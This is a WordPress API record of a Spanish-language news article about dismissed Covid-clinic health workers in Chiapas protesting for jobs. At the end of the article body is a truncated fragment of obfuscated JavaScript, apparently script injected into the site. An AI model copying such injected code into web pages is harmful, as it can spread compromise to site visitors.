{"id":636,"date":"2022-03-16T23:13:10","date_gmt":"2022-03-16T23:13:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=636"},"modified":"2022-03-16T23:13:11","modified_gmt":"2022-03-16T23:13:11","slug":"profesionales-de-salud-piden-espacios-laborales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=636","title":{"rendered":"Profesionales de salud, piden espacios laborales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"759\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220316-WA0064-1024x759.jpg\" alt=\"\" class=\"wp-image-637\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220316-WA0064-1024x759.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220316-WA0064-300x222.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220316-WA0064-768x569.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220316-WA0064.jpg 1052w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 16 de marzo del 2022. Tuxtla Guti\u00e9rrez.- Trabajadores de salud que prestaron su servicio en la temporada m\u00e1s \u00e1lgida de la pandemia del Covid-19, protestaron para que les otorguen espacios laborales tras haber sido despedidos.<\/p>\n\n\n\n<p>Son m\u00e1s de 300 trabajadores de las 12 cl\u00ednicas Covid que se instalaron desde 2020 en Chiapas protestaron en la Secretar\u00eda de Salud, ante la falta de espacios.<\/p>\n\n\n\n<p>Recordaron que, viajaron a la Ciudad de M\u00e9xico para solicitar informaci\u00f3n ya que la depencia estatal manifest\u00f3 que la Federaci\u00f3n no hab\u00eda enviado recursos para sus contratos, sin embargo, a trav\u00e9s del portal de transparencia les informaron en CDMX oficinas centrales de Salud federal que el recurso ya fue enviado a Chiapas.<\/p>\n\n\n\n<p>\u201cComo profesionales de la Salud nos mantuvimos en primera l\u00ednea de batalla contra la pandemia por COVID-19 y sin equipo de protecci\u00f3n, tuvimos que adquirir insumos por propia cuenta o por donaciones altruistas\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Ante ello, pidieron una mesa de di\u00e1logo para que les garanticen espacios para desempe\u00f1arse, ya que actualmente la mayor\u00eda ejerce otros oficios lejanos a su profesi\u00f3n para poder sobrevivir.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores Agencia ReporteCiudadano, 16 de marzo del 2022. Tuxtla Guti\u00e9rrez.- Trabajadores de salud que prestaron su servicio en la temporada m\u00e1s \u00e1lgida de la pandemia del Covid-19, protestaron para que les otorguen espacios laborales tras haber sido despedidos. Son m\u00e1s de 300 trabajadores de las 12 cl\u00ednicas Covid que se instalaron desde 2020 en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":637,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-636","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/636","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=636"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/636\/revisions"}],"predecessor-version":[{"id":638,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/636\/revisions\/638"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/637"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=636"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=636"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=636"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}